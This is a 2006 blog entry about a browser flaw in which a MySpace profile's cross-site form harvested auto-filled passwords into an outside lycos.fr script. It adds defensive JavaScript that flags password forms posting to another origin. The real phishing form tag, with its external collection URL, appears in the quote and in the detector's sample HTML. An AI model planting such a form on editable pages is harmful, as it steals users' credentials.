Monday November 27, 2006 | lowem.log | Inflation, Investing and Everything
forums.mozillazine.org -> bugzilla.mozilla.org:

"I was shocked today to find an in-the-wild phish that uses nothing more than cross-site forms, and also extracts information from the Password Manager! The underlying method was so obvious that it should have raised multiple warnings. There were none at all. It was in a MySpace profile that included this tag:

<form name="2" action="http://membres.lycos.fr/adel88duran/plaguedoctor.php" method="post">

What followed was a nearly perfect-looking MySpace login form that used simple HTML and absolute positioning. Not only did Firefox fail to raise a warning, it auto-filled my www.myspace.com username and password into this form!! I hope anyone reading this realizes it is a security failure for the browser to auto-fill the membres.lycos.fr form with credentials from another website ..."

As a browser security breach, this is too easy. Have to be very careful before submitting forms with auto-filled passwords. Seems to be a basic design issue that affects both IE and Firefox. Convenience vs security.

Kind of ignored this from a couple of weeks back until I went over to Mozillazine and read how the bug works. Really too easy. All you need is a website that allows people to edit HTML code, and for you to have a saved password on that site. 2 weeks now, and still awaiting a 2.0.x fix for Firefox. At least we know that the Firefox folks are working on it.

Update - to check if your browser is vulnerable to this exploit, you can try this demo page by Heise Security. From comment #66 in the bugzilla page. (2006-11-27 16:44:53 SGT)
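The failure described above comes down to one missing check: the password manager matched saved credentials on the page's origin (www.myspace.com) without looking at where the form actually submits (membres.lycos.fr). The following is an added example, not code from the original post, from Mozilla or from Heise; it shows the defender-side check a browser, or a site that lets users publish HTML, should perform: resolve each form's action against the page URL and flag any form containing a password field whose submit target is a different origin. The function names, the sample page URL and the same-origin login form are assumptions constructed for the example; the cross-site form tag is the one quoted in the post.

```javascript
// Added example: detect forms that would send a page's password into another origin.
// Not part of the original post or of any browser's password manager code.

// Resolve a form's action attribute the way a browser would: relative to the
// page URL, with an empty/missing action meaning "submit to the current page".
function resolveFormAction(action, pageUrl) {
  if (!action) return new URL(pageUrl);
  return new URL(action, pageUrl);
}

// True when the form's submit target has a different origin (scheme + host + port)
// from the page it appears on. This is the check the password manager skipped.
function isCrossOriginAction(action, pageUrl) {
  const page = new URL(pageUrl);
  const target = resolveFormAction(action, pageUrl);
  return target.origin !== page.origin;
}

// Pull out every <form> with its action attribute and whether it contains a
// password input. Regex-based for a self-contained example; a production scanner
// should use a real HTML parser (and so should the browser, which already has the DOM).
function extractForms(html) {
  const forms = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    const actionMatch = /\baction\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(attrs);
    const action = actionMatch ? (actionMatch[1] ?? actionMatch[2] ?? actionMatch[3]) : '';
    const hasPassword = /<input\b[^>]*\btype\s*=\s*["']?password["']?/i.test(body);
    forms.push({ action, hasPassword });
  }
  return forms;
}

// Report forms that collect a password and ship it to another origin.
// Each hit carries the raw action and the resolved target origin for logging.
function findCredentialHarvestingForms(html, pageUrl) {
  return extractForms(html)
    .filter(f => f.hasPassword && isCrossOriginAction(f.action, pageUrl))
    .map(f => ({ action: f.action, target: resolveFormAction(f.action, pageUrl).origin }));
}

// Constructed sample (assumption): a profile page on the legitimate site that
// carries the cross-site form from the post next to the site's own login form.
const SAMPLE_PAGE_URL = 'http://www.myspace.com/some-profile';
const SAMPLE_HTML = `
<div style="position:absolute; top:0; left:0;">
  <form name="2" action="http://membres.lycos.fr/adel88duran/plaguedoctor.php" method="post">
    <input type="text" name="email">
    <input type="password" name="password">
    <input type="submit" value="Login">
  </form>
</div>
<form action="/index.cfm?fuseaction=login.process" method="post">
  <input type="text" name="email">
  <input type="password" name="password">
</form>
<form action="/search" method="get"><input type="text" name="q"></form>
`;

// Run the scanner over the sample when executed directly.
const flagged = findCredentialHarvestingForms(SAMPLE_HTML, SAMPLE_PAGE_URL);
for (const f of flagged) {
  console.log(`password form on ${new URL(SAMPLE_PAGE_URL).origin} submits to ${f.target} (action=${f.action})`);
}
```

The check compares full origins, so a form posting to a different subdomain, scheme or port is also flagged; that is stricter than host-only matching, which is the right default when the question is "should saved credentials go here". Note what the check does not do: it only looks at where the form submits, so it is a fit for the password manager's auto-fill decision and for a sanitizer on user-editable pages, not a substitute for refusing untrusted form markup in profiles altogether.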
[Tech]